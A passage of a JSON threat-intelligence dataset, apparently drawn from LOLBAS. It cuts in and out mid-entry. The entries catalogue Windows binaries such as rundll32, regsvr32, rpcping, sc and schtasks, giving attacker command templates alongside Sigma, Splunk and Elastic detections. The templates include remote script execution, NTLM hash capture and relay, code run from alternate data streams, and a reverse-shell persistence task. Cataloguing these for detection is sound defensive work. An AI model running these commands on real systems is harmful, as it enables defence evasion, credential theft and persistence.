regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"]},{"id":"lolbas:regsvr32-exe:5","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regsvr32.exe /u /s {PATH:.dll}","description":"Execute code in a DLL. The code must be inside the exported function `DllUnRegisterServer`.","usecase":"Execute DLL file","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"]},{"id":"lolbas:replace-exe:0","toolId":"lolbas:replace-exe","toolName":"Replace.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"replace.exe {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE:folder} /A","description":"Copy .cab file to destination","usecase":"Copy files","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\replace.exe","C:\\Windows\\SysWOW64\\replace.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Replace.exe retrieving files from remote server"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml"}],"references":["https://twitter.com/elceef/status/986334113941655553","https://twitter.com/elceef/status/986842299861782529","https://lolbas-project.github.io/lolbas/Binaries/Replace/"]},{"id":"lolbas:replace-exe:1","toolId":"lolbas:replace-exe","toolName":"Replace.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"replace.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:folder} /A","description":"Download/Copy executable to specified folder","usecase":"Download file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\replace.exe","C:\\Windows\\SysWOW64\\replace.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Replace.exe retrieving files from remote server"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml"}],"references":["https://twitter.com/elceef/status/986334113941655553","https://twitter.com/elceef/status/986842299861782529","https://lolbas-project.github.io/lolbas/Binaries/Replace/"]},{"id":"lolbas:reset-exe:0","toolId":"lolbas:reset-exe","toolName":"Reset.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"reset.exe session","description":"Once executed, `reset.exe` will execute `rwinsta.exe` in the same folder. Thus, if `reset.exe` is copied to a folder and an arbitrary executable is renamed to `rwinsta.exe`, `reset.exe` will spawn it.","usecase":"Execute an arbitrary executable via trusted system executable.","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\reset.exe","c:\\windows\\syswow64\\reset.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"reset.exe being executed and executes rwinsta.exe outside of its normal path of c:\\windows\\system32\\ or c:\\windows\\syswow64\\"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/Reset/"]},{"id":"lolbas:rpcping-exe:0","toolId":"lolbas:rpcping-exe","toolName":"Rpcping.exe","name":"Credentials","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Credentials"],"command":"rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM","description":"Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.","usecase":"Capture credentials on a non-standard port","mitre":["T1003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rpcping.exe","C:\\Windows\\SysWOW64\\rpcping.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml"}],"references":["https://github.com/vysec/RedTips","https://twitter.com/vysecurity/status/974806438316072960","https://twitter.com/vysecurity/status/873181705024266241","https://twitter.com/splinter_code/status/1421144623678988298","https://lolbas-project.github.io/lolbas/Binaries/Rpcping/"]},{"id":"lolbas:rpcping-exe:1","toolId":"lolbas:rpcping-exe","toolName":"Rpcping.exe","name":"Credentials","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Credentials"],"command":"rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM","description":"Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set).","usecase":"Relay a NTLM authentication over RPC (ncacn_ip_tcp) on a custom port","mitre":["T1187"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rpcping.exe","C:\\Windows\\SysWOW64\\rpcping.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml"}],"references":["https://github.com/vysec/RedTips","https://twitter.com/vysecurity/status/974806438316072960","https://twitter.com/vysecurity/status/873181705024266241","https://twitter.com/splinter_code/status/1421144623678988298","https://lolbas-project.github.io/lolbas/Binaries/Rpcping/"]},{"id":"lolbas:rundll32-exe:0","toolId":"lolbas:rundll32-exe","toolName":"Rundll32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe {PATH},EntryPoint","description":"First part should be a DLL file (any extension accepted), EntryPoint should be the name of the entry point in the DLL file to execute.","usecase":"Execute DLL file","mitre":["T1218.011"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml"},{"type":"IOC","value":"Outbount Internet/network connections made from rundll32"},{"type":"IOC","value":"Suspicious use of cmdline flags such as -sta"}],"references":["https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/","https://github.com/sailay1996/expl-bin/blob/master/obfus.md","https://github.com/sailay1996/misc-bin/blob/master/rundll32.md","https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90","https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code","https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"]},{"id":"lolbas:rundll32-exe:1","toolId":"lolbas:rundll32-exe","toolName":"Rundll32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe {PATH_SMB:.dll},EntryPoint","description":"Execute a DLL from an SMB share. EntryPoint is the name of the entry point in the DLL file to execute.","usecase":"Execute DLL from SMB share.","mitre":["T1218.011"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml"},{"type":"IOC","value":"Outbount Internet/network connections made from rundll32"},{"type":"IOC","value":"Suspicious use of cmdline flags such as -sta"}],"references":["https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/","https://github.com/sailay1996/expl-bin/blob/master/obfus.md","https://github.com/sailay1996/misc-bin/blob/master/rundll32.md","https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90","https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code","https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"]},{"id":"lolbas:rundll32-exe:2","toolId":"lolbas:rundll32-exe","toolName":"Rundll32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:{REMOTEURL}\")","description":"Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.","usecase":"Execute code from Internet","mitre":["T1218.011"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml"},{"type":"IOC","value":"Outbount Internet/network connections made from rundll32"},{"type":"IOC","value":"Suspicious use of cmdline flags such as -sta"}],"references":["https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/","https://github.com/sailay1996/expl-bin/blob/master/obfus.md","https://github.com/sailay1996/misc-bin/blob/master/rundll32.md","https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90","https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code","https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"]},{"id":"lolbas:rundll32-exe:3","toolId":"lolbas:rundll32-exe","toolName":"Rundll32.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"rundll32 \"{PATH}:ADSDLL.dll\",DllMain","description":"Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).","usecase":"Execute code from alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml"},{"type":"IOC","value":"Outbount Internet/network connections made from rundll32"},{"type":"IOC","value":"Suspicious use of cmdline flags such as -sta"}],"references":["https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/","https://github.com/sailay1996/expl-bin/blob/master/obfus.md","https://github.com/sailay1996/misc-bin/blob/master/rundll32.md","https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90","https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code","https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"]},{"id":"lolbas:rundll32-exe:4","toolId":"lolbas:rundll32-exe","toolName":"Rundll32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe -sta {CLSID}","description":"Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.","usecase":"Execute a DLL/EXE COM server payload or ScriptletURL code.","mitre":["T1218.011"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml"},{"type":"IOC","value":"Outbount Internet/network connections made from rundll32"},{"type":"IOC","value":"Suspicious use of cmdline flags such as -sta"}],"references":["https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/","https://github.com/sailay1996/expl-bin/blob/master/obfus.md","https://github.com/sailay1996/misc-bin/blob/master/rundll32.md","https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90","https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code","https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"]},{"id":"lolbas:runexehelper-exe:0","toolId":"lolbas:runexehelper-exe","toolName":"Runexehelper.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"runexehelper.exe {PATH_ABSOLUTE:.exe}","description":"Launches the specified exe. Prerequisites: (1) diagtrack_action_output environment variable must be set to an existing, writable folder; (2) runexewithargs_output.txt file cannot exist in the folder indicated by the variable.","usecase":"Executes arbitrary code","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\runexehelper.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml"},{"type":"IOC","value":"c:\\windows\\system32\\runexehelper.exe is run"},{"type":"IOC","value":"Existence of runexewithargs_output.txt file"}],"references":["https://twitter.com/0gtweet/status/1206692239839289344","https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/"]},{"id":"lolbas:runonce-exe:0","toolId":"lolbas:runonce-exe","toolName":"Runonce.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Runonce.exe /AlternateShellStartup","description":"Executes a Run Once Task that has been configured in the registry.","usecase":"Persistence, bypassing defensive counter measures","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\runonce.exe","C:\\Windows\\SysWOW64\\runonce.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_runonce_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/2926e98c5d998706ef7e248a63fb0367c841f685/rules/windows/persistence_run_key_and_startup_broad.toml"},{"type":"IOC","value":"Registy key add - HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\YOURKEY"}],"references":["https://twitter.com/pabraeken/status/990717080805789697","https://cmatskas.com/configure-a-runonce-task-on-windows/","https://lolbas-project.github.io/lolbas/Binaries/Runonce/"]},{"id":"lolbas:runscripthelper-exe:0","toolId":"lolbas:runscripthelper-exe","toolName":"Runscripthelper.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"runscripthelper.exe surfacecheck \\\\?\\{PATH_ABSOLUTE:.txt} {PATH_ABSOLUTE:folder}","description":"Execute the PowerShell script with .txt extension","usecase":"Bypass constrained language mode and execute Powershell script","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\WinSxS\\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\\Runscripthelper.exe","C:\\Windows\\WinSxS\\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\\Runscripthelper.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Event ID 4104 - Microsoft-Windows-PowerShell/Operational"},{"type":"IOC","value":"Event ID 400 - Windows PowerShell"}],"references":["https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc","https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/"]},{"id":"lolbas:sc-exe:0","toolId":"lolbas:sc-exe","toolName":"Sc.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"sc create evilservice binPath=\"\\\"c:\\\\ADS\\\\file.txt:cmd.exe\\\" /c echo works > \\\"c:\\ADS\\works.txt\\\"\" DisplayName= \"evilservice\" start= auto\\ & sc start evilservice","description":"Creates a new service and executes the file stored in the ADS.","usecase":"Execute binary file hidden inside an alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\sc.exe","C:\\Windows\\SysWOW64\\sc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/sc_exe_manipulating_windows_services.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/lateral_movement_cmd_service.toml"},{"type":"IOC","value":"Unexpected service creation"},{"type":"IOC","value":"Unexpected service modification"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Sc/"]},{"id":"lolbas:sc-exe:1","toolId":"lolbas:sc-exe","toolName":"Sc.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"sc config {ExistingServiceName} binPath=\"\\\"c:\\\\ADS\\\\file.txt:cmd.exe\\\" /c echo works > \\\"c:\\ADS\\works.txt\\\"\" & sc start {ExistingServiceName}","description":"Modifies an existing service and executes the file stored in the ADS.","usecase":"Execute binary file hidden inside an alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\sc.exe","C:\\Windows\\SysWOW64\\sc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/sc_exe_manipulating_windows_services.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/lateral_movement_cmd_service.toml"},{"type":"IOC","value":"Unexpected service creation"},{"type":"IOC","value":"Unexpected service modification"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Sc/"]},{"id":"lolbas:schtasks-exe:0","toolId":"lolbas:schtasks-exe","toolName":"Schtasks.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"schtasks /create /sc minute /mo 1 /tn \"Reverse shell\" /tr \"{CMD}\"","description":"Create a recurring task to execute every minute.","usecase":"Create a recurring task to keep reverse shell session(s) alive","mitre":["T1053.005"],"privilege":"user","fullPath":["c:\\windows\\system32\\schtasks.exe","c:\\windows\\syswow64\\schtasks.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_schtasks_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/persistence_local_scheduled_task_creation.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/schtasks_scheduling_job_on_remote_system.yml"},{"type":"IOC","value":"Suspicious task creation events"}],"references":["https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/","https://lolbas-project.github.io/lolbas/Binaries/Schtasks/"]},{"id":"lolbas:schtasks-exe:1","toolId":"lolbas:schtasks-exe","toolName":"Schtasks.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"schtasks /create /s targetmachine /tn \"MyTask\" /tr \"{CMD}\" /sc daily","description":"Create a scheduled task on a remote computer for persistence/lateral movement","usecase":"Create a remote task to run daily relative to the the time of creation","mitre":["T1053.005"],"privilege":"admin","fullPath":["c:\\windows\\system32\\schtasks.exe","c:\\windows\\syswow64\\schtasks.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_schtasks_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/persistence_local_scheduled_task_creation.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/schtasks_scheduling_job_on_remote_system.yml"},{"type":"IOC","value":"Suspicious task creation events"}],"references":["https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/","https://lolbas-project.github.io/lolbas/Binaries/Schtasks/"]},{"id":"lolbas:scp-exe:0","toolId":"lolbas:scp-exe","toolName":"scp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"scp.exe -o ProxyCommand=\"{CMD}\" . localhost:.","description":"Spawns specified command from `scp.exe` -> `ssh.exe`, even if no SSH server is running on localhost (or any other address specified).","usecase":"Proxy execution of specified command, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\OpenSSH\\scp.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"`scp.exe` executions referencing `ProxyCommand`."}],"references":["https://gtfobins.org/gtfobins/scp/","https://lolbas-project.github.io/lolbas/Binaries/scp/"]},{"id":"lolbas:scp-exe:1","toolId":"lolbas:scp-exe","toolName":"scp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"scp.exe -S \"{CMD}\" . localhost:.","description":"Spawns specified command from `scp.exe` -> `ssh.exe`, even if no SSH server is running on localhost (or any other address specified).","usecase":"Proxy execution of specified command, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\OpenSSH\\scp.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"`scp.exe` executions referencing 